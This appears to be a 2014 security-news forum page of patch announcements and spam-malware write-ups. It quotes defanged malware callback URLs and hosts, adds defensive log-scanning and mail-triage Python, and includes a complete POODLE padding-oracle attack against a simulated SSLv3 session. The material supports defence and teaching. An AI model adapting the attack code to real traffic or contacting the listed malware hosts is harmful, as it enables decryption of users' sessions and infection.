News: Cexx forums, with volunteers dedicated to helping you remove malware and stay protected
 81 
 on: October 16, 2014, 12:55:30  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

PHP 5.5.18 released
- http://php.net/
16 Oct 2014 - "The PHP development team announces the immediate availability of PHP 5.5.18. Several bugs were fixed in this release. A -regression- in OpenSSL introduced in PHP 5.5.17 has also been addressed in this release. PHP 5.5.18 also fixes -4- CVEs in different components. All PHP 5.5 users are encouraged to upgrade to this version..."

Changelog:
- http://php.net/ChangeLog-5.php#5.5.18

Downloads:
- http://www.php.net/downloads.php

- http://windows.php.net/download/


 82 
 on: October 16, 2014, 12:27:25  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Fake Bank SPAM
- http://blog.dynamoo.com/2014/10/barclays-bank-transaction-not-complete.html
16 Oct 2014 - "This fake Barclays spam leads to malware.
   From:     Barclays Bank [Barclays@email .barclays .co.uk]
    Date:     16 October 2014 12:48
    Subject:     Transaction not complete
    Unable to complete your most recent Transaction.
    Currently your transaction has a pending status. If the transaction was made by mistake please contact our customer service.
    For more details please download payment receipt below...


Clicking on the link downloads a file document23_pdf.zip containing a malicious executable document23_pdf.scr which has a VirusTotal detection rate of 4/54*. The Malwr report shows that it reaches out to the following URLs:
http ://188.165.214.6 :12302/1610uk1/HOME/0/51-SP3/0/
http ://188.165.214.6 :12302/1610uk1/HOME/1/0/0/
http ://188.165.214.6 :12302/1610uk1/HOME/41/5/1/
http ://jwoffroad .co.uk/img/t/1610uk1.osa
In my opinion 188.165.214.6 (OVH, France) is an excellent candidate to -block- or monitor. It also drops two executables, bxqyy.exe (VT 5/54** ...) and ldplh.exe (VT 1/51*** ...)."
* https://www.virustotal.com/en/file/626687777469a5a1cca0303fd565ee230fb5f5799a6d8cbaec097a5f7266eb28/analysis/1413462043/
... Behavioural information
DNS requests
jwoffroad .co.uk (88.208.252.216)
TCP connections
188.165.214.6: https://www.virustotal.com/en/ip-address/188.165.214.6/information/
88.208.252.216: https://www.virustotal.com/en/ip-address/88.208.252.216/information/

** https://www.virustotal.com/en/file/8d5d66e390e2293bec87422dfa2f4683b423e8084a07de207a75d2831f88d9a8/analysis/1413462507/

*** https://www.virustotal.com/en/file/752afd97f0473ec909797c02ac49b3f33e94ca06d6678af517d6d2fe98e00341/analysis/1413462517/
___

Many .su and .ru domains leading to malware
- http://blog.dynamoo.com/2014/10/a-bunch-of-su-and-ru-domains-leading-to.html
16 Oct 2014 - "These sites lead to some sort of malware. The presence of .SU domains hosted on what looks like a botnet is probably all you need to know.... recommend watching out for these..."
(Long list at the dynamoo URL above.)

- https://www.abuse.ch/?p=3581

- http://blog.dynamoo.com/2013/03/zbot-sites-to-block.html
"The obsolete .su (Soviet Union) domain is usually a tell-tale sign..."

___

Fake Invoice SPAM
- http://myonlinesecurity.co.uk/re-invoice-4023390-fake-pdf-malware/
16 Oct 2014 - "'RE: Invoice #4023390' pretending to come from Sage Accounting < Alfonso.Williamson@ sage-mail .com > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

    Please see attached copy of the original invoice.

16 October 2014: Invoice_4017618.zip: Extracts to: Invoice_4017618.exe
Current Virus total detections: 5/54* . This RE: Invoice #4023390 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e9645b9120975b47e440f60c182e4701e14c9f653a55bb0b4bec82bb71fe1c2d/analysis/1413490281/
... Behavioural information
DNS requests
lewis-teck .co.uk (5.77.44.47)
TCP connections
188.165.214.6: https://www.virustotal.com/en/ip-address/188.165.214.6/information/
5.77.44.47: https://www.virustotal.com/en/ip-address/5.77.44.47/information/
___

FBI warns of Chinese cyber campaign
- http://www.washingtonpost.com/world/national-security/fbi-warns-industry-of-chinese-cyber-campaign/2014/10/15/0349a00a-54b0-11e4-ba4b-f6333e2c0453_story.html
Oct 15, 2014 - "The FBI on Wednesday issued a private warning to industry that a group of highly skilled Chinese government hackers was in the midst of a long-running campaign to steal valuable data from U.S. companies and government agencies. “These state-sponsored hackers are exceedingly stealthy and agile by comparison with the People’s Liberation Army Unit 61398... whose activity was publicly disclosed and attributed by security researchers in February 2013,” said the FBI in its alert, which referred to a Chinese military hacker unit exposed in a widely publicized report by the security firm Mandiant... The group, the FBI said, has deployed at least four “zero-day exploits” or hacking tools based on previously unknown flaws in Microsoft’s Windows operating system, which reflects a considerable degree of prowess as zero-day flaws are difficult to find in software. The bureau’s nine-page alert contained some “indicators of compromise” that companies could use to determine if they have been hacked by the group..."

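Added worked example, not part of the post above and not code from the dynamoo or myonlinesecurity write-ups it quotes: the indicators are printed with spaces inserted to defang them, so the first thing a responder does is refang them and sweep the proxy logs. The Python below reverses that spacing exactly as the post formats it, collects the hosts from the 188.165.214.6:12302 callback URLs, jwoffroad.co.uk and lewis-teck.co.uk plus the resolved IPs listed under the VirusTotal behaviour sections, and runs them over Squid-format access log lines. The log lines are constructed for the example; the internal client addresses and the 192.0.2.10 peer are invented, only the indicators come from the post.

```python
import re
from urllib.parse import urlsplit

# Indicators exactly as the post above prints them (spaces inserted to defang).
DEFANGED_IOCS = [
    "http ://188.165.214.6 :12302/1610uk1/HOME/0/51-SP3/0/",
    "http ://188.165.214.6 :12302/1610uk1/HOME/1/0/0/",
    "http ://188.165.214.6 :12302/1610uk1/HOME/41/5/1/",
    "http ://jwoffroad .co.uk/img/t/1610uk1.osa",
    "lewis-teck .co.uk",
]
# Addresses listed under the VirusTotal "TCP connections" / "DNS requests" sections above.
RESOLVED_IPS = {"188.165.214.6", "88.208.252.216", "5.77.44.47"}

def refang(ioc: str) -> str:
    """Reverse the 'http ://host :port' and 'name .tld' spacing used to defang the indicators."""
    ioc = re.sub(r"\s*://\s*", "://", ioc)     # "http ://x"        -> "http://x"
    ioc = re.sub(r"\s+:(\d+)", r":\1", ioc)    # "host :12302"      -> "host:12302"
    ioc = re.sub(r"\s+\.", ".", ioc)           # "jwoffroad .co.uk" -> "jwoffroad.co.uk"
    return ioc.strip()

def indicator_hosts(defanged=DEFANGED_IOCS) -> set:
    """Hostnames/IPs to watch for, taken from the refanged URLs and bare domains."""
    hosts = set()
    for raw in defanged:
        clean = refang(raw)
        host = urlsplit(clean).hostname if "://" in clean else clean
        hosts.add(host.lower())
    return hosts

# Squid native access.log: time elapsed client code/status bytes method URL ident hierarchy/peer type
SQUID_RE = re.compile(
    r"^(?P<ts>\S+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+(?P<method>\S+)\s+(?P<url>\S+)"
    r"\s+\S+\s+[^\s/]+/(?P<peer>\S+)"
)

def scan_proxy_log(lines, hosts, ips=RESOLVED_IPS):
    """Return (client, matched_indicator) for each line that reached a listed host or peer IP."""
    hits = []
    for line in lines:
        m = SQUID_RE.match(line)
        if not m:
            continue
        url_host = (urlsplit(m["url"]).hostname or "").lower()
        if url_host in hosts:
            hits.append((m["client"], url_host))
        elif m["peer"] in ips:                 # a different hostname fronting the same server
            hits.append((m["client"], m["peer"]))
    return hits

# Constructed sample log (not real traffic): the 10.0.0.x clients and the 192.0.2.10 peer are invented.
PROXY_LOG = """\
1413462043.120    203 10.0.0.15 TCP_MISS/200 1432 GET http://188.165.214.6:12302/1610uk1/HOME/0/51-SP3/0/ - HIER_DIRECT/188.165.214.6 application/octet-stream
1413462050.001     88 10.0.0.15 TCP_MISS/200 9810 GET http://jwoffroad.co.uk/img/t/1610uk1.osa - HIER_DIRECT/88.208.252.216 application/octet-stream
1413462100.500     12 10.0.0.22 TCP_MISS/200 5123 GET http://www.php.net/downloads.php - HIER_DIRECT/192.0.2.10 text/html
1413462200.700     40 10.0.0.31 TCP_MISS/200  700 GET http://lewis-teck.co.uk/ - HIER_DIRECT/5.77.44.47 text/html
""".splitlines()

if __name__ == "__main__":
    for client, what in scan_proxy_log(PROXY_LOG, indicator_hosts()):
        print(f"{client} contacted {what}")
```

Matching on the peer IP as well as the URL host is what lets the second spam run in the post (lewis-teck.co.uk, same 188.165.214.6 callback) be caught by the indicators from the first one.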

 83 
 on: October 16, 2014, 10:44:53  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

OpenSSL patches 4 vulnerabilities
- https://www.us-cert.gov/ncas/current-activity/2014/10/16/OpenSSL-Patches-Four-Vulnerabilities
Oct 16, 2014 - "OpenSSL has released updates patching four vulnerabilities, some of which may allow an attacker to cause a Denial of Service (DoS) condition or execute man-in-the-middle attacks. The following updates are available:
 OpenSSL 1.0.1 users should upgrade to 1.0.1j
 OpenSSL 1.0.0 users should upgrade to 1.0.0o
 OpenSSL 0.9.8 users should upgrade to 0.9.8zc
US-CERT recommends users and administrators review the OpenSSL Security Advisory* for additional information and apply the necessary updates."
* https://www.openssl.org/news/secadv_20141015.txt

- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3566 - 4.3
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568
___

- http://www.securitytracker.com/id/1031053
Oct 15 2014

- http://www.securitytracker.com/id/1031052
Oct 15 2014


 84 
 on: October 16, 2014, 03:31:09  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Opera 25 released
- http://www.opera.com/docs/changelogs/unified/2500/
2014-10-15
Improvements since Opera 24:
- Stability enhancements.
- Enhanced support for Chromium extensions.
- Memory and loading improvements for the start page.
- Fixes and enhancements for how Opera handles HiDPI video and MP3 audio.
- Network installation for Mac.
- Enhancement for the Opera tile icon on Windows 8.

- https://secunia.com/advisories/60965/
Release Date: 2014-10-16
... vulnerabilities are caused due to a bundled, vulnerable version of Chromium. No further information is currently available.
The vulnerabilities are reported in versions prior to 25.
Solution: Upgrade to version 25.
___

Note: Opera market share is reported at under 1% for Sep 2014:
- http://www.netmarketshare.com/browser-market-share.aspx?qprid=0&qpcustomd=0
Posts in this thread will be made when it rises above that mark.



 85 
 on: October 16, 2014, 02:24:06  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

SSL Padding Oracle On Downgraded Legacy Encryption (POODLE) Vuln
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle
2014 Oct 15 - "Summary: On October 14, 2014, a vulnerability was publicly announced in the Secure Sockets Layer version 3 (SSLv3) protocol when using a block cipher in Cipher Block Chaining (CBC) mode. SSLv3 is a cryptographic protocol designed to provide communication security, which has been superseded by Transport Layer Security (TLS) protocols. By exploiting this vulnerability, an attacker could decrypt a subset of the encrypted communication.
Affected Products: Cisco is evaluating products to determine their exposure to this vulnerability.
Products will be listed in the Vulnerable Products section of this advisory if they fit both the following criteria:
    SSLv3 is supported by the product
    A block cipher in CBC mode is one of the transform sets being offered
Products will be listed in the Products Confirmed Not Vulnerable section of this advisory if they fit either of the following criteria:
    SSLv3 is not supported by the product
    SSLv3 is supported by the product but no block cipher in CBC mode is offered in the transform set...
The list of vulnerable products will be populated as the products are being evaluated..."

Cisco TelePresence Video Communication Server and Cisco Expressway Software Multiple Vulns
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-vcs
2014 Oct 15 - "Summary: Cisco TelePresence Video Communication Server (VCS) and Cisco Expressway Software includes the following vulnerabilities:
    Cisco TelePresence VCS and Cisco Expressway Crafted Packets Denial of Service Vulnerability
    Cisco TelePresence VCS and Cisco Expressway SIP IX Filter Denial of Service Vulnerability
    Cisco TelePresence VCS and Cisco Expressway SIP Denial of Service Vulnerability
Successful exploitation of any of these vulnerabilities could allow an unauthenticated, remote attacker to cause a reload of the affected system, which may result in a Denial of Service (DoS) condition. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are not available..."
- http://www.securitytracker.com/id/1031055
CVE Reference: CVE-2014-3368, CVE-2014-3369, CVE-2014-3370
Oct 15 2014
Fix Available:  Yes  Vendor Confirmed:  Yes ...
Impact: A remote user can cause the target system to crash and reload.
Solution: The vendor has issued a fix (X8.2)...

Cisco TelePresence MCU Software Memory Exhaustion Vuln
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-mcu
2014 Oct 15 - "Summary: A vulnerability in the network stack of Cisco TelePresence MCU Software could allow an unauthenticated, remote attacker to cause the exhaustion of available memory which could lead to system instability and a reload of the affected system. Cisco has released free software updates that address this vulnerability. Workarounds that mitigate this vulnerability are not available..."
- http://www.securitytracker.com/id/1031054
CVE Reference: CVE-2014-3397
Oct 15 2014
Fix Available:  Yes  Vendor Confirmed:  Yes 
Version(s): prior to 4.3(2.30)...
The following models are affected:
Cisco TelePresence MCU 4200 Series
Cisco TelePresence MCU 4500 Series
Cisco TelePresence MCU MSE 8420
Impact: A remote user can consume all available memory, causing the system to become unstable and reload.
Solution: The vendor has issued a fix (4.3(2.30))...

Cisco Unified Communications Domain Manager Multiple Vulns
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140702-cucdm
2014 Oct 13 - Rev. 3.0 - "Summary: Cisco Unified Communications Domain Manager (Cisco Unified CDM) is affected by the following vulnerabilities:
- Cisco Unified Communications Domain Manager Privilege Escalation Vulnerability
- Cisco Unified Communications Domain Manager Default SSH Key Vulnerability
- Cisco Unified Communications Domain Manager BVSMWeb Unauthorized Data Manipulation Vulnerability
Successful exploitation of the Cisco Unified Communications Domain Manager Privilege Escalation Vulnerability or of the Cisco Unified Communications Domain Manager Default SSH Key Vulnerability may allow an attacker to execute arbitrary commands or obtain privileged access to the affected system.
Successful exploitation of the Cisco Unified Communications Domain Manager BVSMWeb Unauthorized Data Manipulation Vulnerability may allow an attacker to access and modify BVSMWeb portal user information such as settings in the personal phone directory, speed dials, Single Number Reach, and call forward settings.
Cisco has released free software updates that address the Cisco Unified Communications Domain Manager Privilege Escalation Vulnerability and the Cisco Unified Communications Domain Manager Default SSH Key Vulnerability.
Cisco will provide a free software update for the Cisco Unified Communications Domain Manager BVSMWeb Unauthorized Data Manipulation Vulnerability as soon as the fix is available. Workarounds that mitigate these vulnerabilities are not available. Customers that are concerned about the Cisco Unified Communications Domain Manager BVSMWeb Unauthorized Data Manipulation Vulnerability may apply the mitigation detailed in the "Workarounds" section of this advisory.
Note: Due to an error in the fix of the Cisco Unified Communications Domain Manager Default SSH Key Vulnerability, all Cisco Unified CDM Platform Software releases are vulnerable regardless if a previous patch has been applied due to this security advisory. This advisory has been updated to provide additional information about the fix for the Cisco Unified Communications Domain Manager Default SSH Key Vulnerability..."
Rev 3.0 - 2014-Oct-13 - Added important information regarding fixed versions of the Cisco Unified Communications Domain Manager Default SSH Key Vulnerability.

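Added worked example, not from the post above nor from the Cisco or OpenSSL advisories it quotes: a Python model of the POODLE padding oracle (CVE-2014-3566, the SSLv3 entry in the OpenSSL post two entries up), showing why Cisco's two criteria, SSLv3 plus a CBC-mode cipher, are exactly the exposure. SSLv3 checks only the padding-length byte and never the padding bytes themselves, so an attacker who can make the client resend a request (script in the browser) and tamper with records in transit (man in the middle) copies a target ciphertext block over the all-padding final block; the server accepts the record once in about 256 tries, and each acceptance leaks one plaintext byte. Everything here is my stand-in, not SSLv3 code: a 4-round Feistel cipher over SHA-256 replaces AES/3DES, HMAC-SHA1 replaces the record MAC, and each resend gets a fresh random IV where real SSLv3 chains the CBC state across records (same effect for the attack). The "cookie=7" secret and the A/B filler bytes are constructed input.

```python
import hashlib
import hmac
import os

BLOCK = 16     # cipher block size
MAC_LEN = 20   # HMAC-SHA1 stands in for the SSLv3 record MAC

# Toy block cipher: 4-round Feistel over 16-byte blocks with SHA-256 as the round function.
# It stands in for AES/3DES so the demo runs on the standard library alone; it is not secure.
def _f(key, i, half):
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def block_encrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in range(4):
        l, r = r, _xor(l, _f(key, i, r))
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _f(key, i, l)), l
    return l + r

def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(_xor(block_decrypt(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return b"".join(out)

class Sslv3Session:
    """Client and server sharing keys. send() is the browser re-issuing a request whose prefix
    length attacker-controlled script can choose but whose secret it cannot read; receive() is
    the server's SSLv3 order of checks: padding length byte first, then the MAC."""
    def __init__(self, secret):
        self.enc_key, self.mac_key, self.secret = os.urandom(16), os.urandom(16), secret

    def _mac(self, data):
        return hmac.new(self.mac_key, data, hashlib.sha1).digest()

    def send(self, prefix_len):
        data = b"A" * prefix_len + self.secret
        data += b"B" * (-(len(data) + MAC_LEN) % BLOCK)   # align so the padding becomes a whole block
        pt = data + self._mac(data) + os.urandom(BLOCK - 1) + bytes([BLOCK - 1])
        iv = os.urandom(BLOCK)                            # fresh IV per resend (real SSLv3 chains records)
        return iv + cbc_encrypt(self.enc_key, iv, pt)

    def receive(self, stream):
        pt = cbc_decrypt(self.enc_key, stream[:BLOCK], stream[BLOCK:])
        pad_len = pt[-1]
        if pad_len >= BLOCK:          # SSLv3 checks only this byte; the padding bytes are never verified
            return False
        body = pt[:len(pt) - pad_len - 1]
        return hmac.compare_digest(body[-MAC_LEN:], self._mac(body[:-MAC_LEN]))

def tls_padding_ok(pt):
    """TLS (RFC 2246 onward) additionally requires every padding byte to equal the length byte."""
    n = pt[-1]
    return all(b == n for b in pt[-(n + 1):])

def poodle_recover_byte(session, prefix_len, target_block):
    """Recover the last plaintext byte of ciphertext block `target_block` (numbered from 1; block 0 is the IV).
    Each attempt: make the client resend, copy C_target over the all-padding last block, watch accept/reject."""
    for _ in range(64 * 256):                      # ~256 attempts expected; the bound is a safety net
        stream = session.send(prefix_len)
        blocks = [stream[i:i + BLOCK] for i in range(0, len(stream), BLOCK)]
        n = len(blocks) - 1
        blocks[n] = blocks[target_block]
        if session.receive(b"".join(blocks)):
            # Accepted, so D(C_target) xor C_{n-1} ends in 0x0f; and D(C_target) = P_target xor C_{target-1}.
            return (BLOCK - 1) ^ blocks[n - 1][-1] ^ blocks[target_block - 1][-1]
    raise RuntimeError("no accepting record found")

def poodle_recover_secret(session, secret_len):
    """Shift the secret one byte at a time into the last position of a block and recover it byte by byte."""
    out = bytearray()
    for k in range(secret_len):
        prefix_len = (BLOCK - 1 - k) % BLOCK              # puts secret[k] at offset 15 of its block
        out.append(poodle_recover_byte(session, prefix_len, (prefix_len + k) // BLOCK + 1))
    return bytes(out)

if __name__ == "__main__":
    print(poodle_recover_secret(Sslv3Session(b"cookie=7"), 8))
```

The fix is not a patched padding check in SSLv3 (the protocol itself leaves the padding bytes unverified, as receive() shows and tls_padding_ok() contrasts) but turning SSLv3 off on both ends; the OpenSSL 1.0.1j/1.0.0o/0.9.8zc releases in the US-CERT entry above also add TLS_FALLBACK_SCSV so a client can refuse a forced downgrade to SSLv3 when the server supports it.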

 86 
 on: October 15, 2014, 07:08:40  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Adblock Plus 1.8.6 for Chrome, Opera and Safari released
- https://adblockplus.org/releases/adblock-plus-186-for-chrome-opera-and-safari-released
2014-10-15 - "Adblock Plus 1.8.6 for Chrome, Opera (Opera 17 or higher required), and Safari (Safari 6 or higher required)..."

Links to the install files and more detail at the URL above.


 87 
 on: October 15, 2014, 04:37:19  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Thunderbird v31.2 released
- http://www.securitytracker.com/id/1031030
CVE Reference: CVE-2014-1574, CVE-2014-1575, CVE-2014-1576, CVE-2014-1577, CVE-2014-1578, CVE-2014-1581, CVE-2014-1583, CVE-2014-1585, CVE-2014-1586
Oct 15 2014
Impact: Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): prior to 31.2 ...
Solution: The vendor has issued a fix (31.2)...

- https://www.mozilla.org/en-US/thunderbird

- https://www.mozilla.org/en-US/thunderbird/31.2.0/releasenotes/
v.31.2.0, released: Oct 14, 2014

Security Advisories
- https://www.mozilla.org/security/known-vulnerabilities/thunderbird.html#thunderbird31.2
Fixed in Thunderbird 31.2
MFSA 2014-81 Inconsistent video sharing within iframe
MFSA 2014-79 Use-after-free interacting with text directionality
MFSA 2014-77 Out-of-bounds write with WebM video
MFSA 2014-76 Web Audio memory corruption issues with custom waveforms
MFSA 2014-75 Buffer overflow during CSS manipulation
MFSA 2014-74 Miscellaneous memory safety hazards (rv:33.0 / rv:31.2)

Automated Updates: https://support.mozillamessaging.com/en-US/kb/updating-thunderbird
Manual check: Go to >Help >About Thunderbird

Download: https://www.mozilla.org/thunderbird/all.html


 88 
 on: October 15, 2014, 03:59:34  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Fake delivery SPAM - word doc malware ...
- http://myonlinesecurity.co.uk/inform-package-way-fake-word-doc-malware/
15 Oct 2014 - "An email pretending that you have purchased an unspecified item from an unspecified store saying 'This is to inform you that the package is on its way to you' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Thank you for buying at our store!
    Date ordered: October 14 2014
    This is to inform you that the package is on its way to you. We also included delivery file to your shipping address.
    Payment Nr : 7795816097 Order total : 527.54 USD Delivery date : 10/ 22th 2014.
    Please review the attached document.


15 October 2014: 0048898757_order _doc.zip: Extracts to: 0048898757_order _doc.exe
Current Virus total detections: 7/54* . This 'This is to inform you that the package is on its way to you' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8c41235f43356c845b193b04efa60bbecb1787028e8ad6e25eb4c01ee2d94804/analysis/1413361301/
___

Fake 'Shipping Info' SPAM
- http://blog.dynamoo.com/2014/10/shipping-information-for-spam-uses.html
15 Oct 2014 - "This fake shipping spam contains malware.. although it appears that it may be buggy and might not install properly.

Screenshot: https://3.bp.blogspot.com/-l3nlpqmPSoo/VD6K3ZdvApI/AAAAAAAAF1E/a_k4VUkXNX0/s1600/shipping-info.png

The link in the email goes to https ://www.google .com/url?q=https%3A%2F%2Fcopy.com%2FEl9fd4VfLkfN%2FTrackShipment_0351.PDF.scr%3Fdownload%3D1&sa=D&sntz=1&usg=AFQjCNE0-3UrX7jNPzSGYodsQVzmBhrwMA which bounces through Google and then downloads a malicious executable TrackShipment_0351.PDF.scr which has a VirusTotal detection rate of 4/54*... What I think is meant to happen is that a malicious script that has been disguising itself as a GIF file which then renames a component Gl.png to Gl.exe and then attempts to execute it... This executable has a VirusTotal detection rate of 2/53**. It bombs out of automated analysis tools... possibly because it is being executed with the wrong parameters. It also opens a seemingly legitimate PDF file (VT 0/54***) which is designed to look like a Commercial Invoice, presumably to mask the fact that it is doing something malicious in the background.
> https://4.bp.blogspot.com/-86SXLSZk37U/VD6PBROpsAI/AAAAAAAAF1c/ZRCiUJev-KI/s1600/commerical-invoice.png
If you opened a file similar to this and you saw a PDF with a blank Commercial Invoice like the one pictured above, then you've probably been -infected- by the executable running in the background."
* https://www.virustotal.com/en-gb/file/e5f0ea546dcfb99803c9a02df82f587fa09b16c87337e868d8eabf360178ba59/analysis/1413383394/

** https://www.virustotal.com/en-gb/file/f9cca52c9d840f3cfc8997e77a42ebc7640ea71f7729fa1782d8596a05ed963b/analysis/1413384221/

*** https://www.virustotal.com/en-gb/file/409e472b667ae747942e10d4dc691796c3b2eb00a0e407146e69b2f8205de40c/analysis/1413384174/
___

Fake Paypal SPAM – PDF malware
- http://myonlinesecurity.co.uk/paypal-transaction-complete-fake-pdf-malware/
15 Oct 2014 - "'Transaction not complete' pretending to come from PayPal is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

     Unable to complete your most recent Transaction.
    Currently your transaction has a pending status.
    If the transaction was made by mistake please contact our customer service.
    For more details please see attached payment receipt .


15 October 2014: Transaction25765048.zip: Extracts to: Transaction_21633987.scr
Current Virus total detections: 7/54* . This 'Transaction not complete' pretending to come from PayPal is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4b742cf87e49bc1cca0ce474ac34dd04ae00e28783aeafcfcd5a45a369be6543/analysis/1413387437/

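Added worked example, not part of the post above and not code from dynamoo or myonlinesecurity: the three runs quoted here (and the Barclays/Sage ones earlier on this page) share two tricks, a link wrapped in a www.google.com/url?q= redirector and an executable named to pass for a document once Windows hides known extensions (TrackShipment_0351.PDF.scr, document23_pdf.scr, 0048898757_order _doc.exe). The Python below does the mail-gateway side of that: unwrap the redirector to get the file the link really fetches, then judge the file name, and do the same for every member of a ZIP attachment without extracting it. The executable-extension list is my choice, the sample archive is built in memory from names taken from the posts, and the verdict strings are invented for the example.

```python
import io
import posixpath
import re
import zipfile
from urllib.parse import parse_qs, urlsplit

# Extensions Windows runs on double-click; list chosen for this example, extend to taste.
EXECUTABLE_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".jse", ".vbs", ".wsf"}
# A stem ending in a document type, e.g. "TrackShipment_0351.PDF" or "document23_pdf".
DOCUMENT_LOOKALIKE = re.compile(r"[._-](?:pdf|doc|docx|xls|xlsx|rtf)$", re.IGNORECASE)

def unwrap_google_redirect(url: str) -> str:
    """Return the real target of a www.google.com/url?q=... wrapper; any other URL is returned unchanged."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if (host == "www.google.com" or host.endswith(".google.com")) and parts.path == "/url":
        target = parse_qs(parts.query).get("q")    # parse_qs percent-decodes the value
        if target:
            return target[0]
    return url

def classify_name(name: str):
    """(is_executable, looks_like_document) for a file name or the last path element of a URL."""
    base = posixpath.basename(urlsplit(name).path if "://" in name else name)
    stem, ext = posixpath.splitext(base)
    return ext.lower() in EXECUTABLE_EXT, bool(DOCUMENT_LOOKALIKE.search(stem))

def verdict(name: str) -> str:
    is_exec, looks_doc = classify_name(name)
    if is_exec and looks_doc:
        return "block: executable disguised as a document"
    if is_exec:
        return "block: executable"
    return "allow"

def triage_link(url: str):
    """Unwrap redirectors first, then judge the file the link actually fetches."""
    final = unwrap_google_redirect(url)
    return final, verdict(final)

def triage_zip(zip_bytes: bytes) -> dict:
    """Verdict per member of a ZIP attachment, read from memory, nothing written to disk."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return {info.filename: verdict(info.filename) for info in zf.infolist()}

def make_sample_zip(names) -> bytes:
    """Constructed sample archive: members carry the names from the posts, with empty bodies."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for n in names:
            zf.writestr(n, b"")
    return buf.getvalue()

# The wrapped link quoted in the post above, with the defanging spaces removed.
WRAPPED = ("https://www.google.com/url?q=https%3A%2F%2Fcopy.com%2FEl9fd4VfLkfN%2F"
           "TrackShipment_0351.PDF.scr%3Fdownload%3D1&sa=D&sntz=1&usg=AFQjCNE0-3UrX7jNPzSGYodsQVzmBhrwMA")
SAMPLE_MEMBERS = ["Transaction_21633987.scr", "0048898757_order _doc.exe", "document23_pdf.scr", "readme.txt"]

if __name__ == "__main__":
    print(triage_link(WRAPPED))
    for member, v in triage_zip(make_sample_zip(SAMPLE_MEMBERS)).items():
        print(member, "->", v)
```

Judging the name inside the archive rather than the attachment's own .zip extension is the point: Transaction25765048.zip looks harmless and the Transaction_21633987.scr it holds does not, and the same check applied to the unwrapped link catches the redirector case the dynamoo entry describes.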

 89 
 on: October 15, 2014, 03:43:39  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

KB2952664 problems ...
- http://myonlinesecurity.co.uk/microsoft-update-kb2952664-problems/
15 Oct 2014 - "Once again the October 2014 windows updates are causing problems on many computers. The biggest problem this month appears to be KB2952664 update for Windows 7. Do -not- install KB 2952664 update for Windows 7 unless you intend to update the windows 7 computer to either Windows 8 or the windows 10 preview. Various forums, including Microsoft help forums* are full of posts complaining about it failing. There is absolutely no need for the majority of users to install this update on their computer. If you have installed it, it will appear in the update history as -failed-. Go to programs & features, all updates and select KB2952664, press uninstall, reboot the computer and all will be OK. Then go to windows update, press check for updates, when the KB2952664 appears in the window, right click the entry and select -hide- update. You might then get a prompt asking for your admin account password if you are running as a standard user or a normal UAC prompt to continue with hiding the update. This KB 2952664 update for Windows 7 has been continually pushed out by Microsoft almost every month since April 2014 with various tweaks and revisions. Most have had some degree of install problems or have caused some degree of system instabilities. The October 2014 version appears to be the most problematic. It isn’t needed so don’t install it..."
* http://answers.microsoft.com/en-us/windows/forum/windows_7-windows_update/new-windows-update-inconsistency-regarding-update/30c7c7d4-d15b-49ed-a08f-edcf9ac1347b

Compatibility update for upgrading Windows 7
- https://support.microsoft.com/kb/2952664

> http://www.infoworld.com/article/2833825/microsoft-windows/windows-7-patch-kb-2952664-fails-with-error-80242016.html
Oct 15, 2014


 90 
 on: October 14, 2014, 15:39:22  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Oracle Critical Patch Update Advisory - October 2014
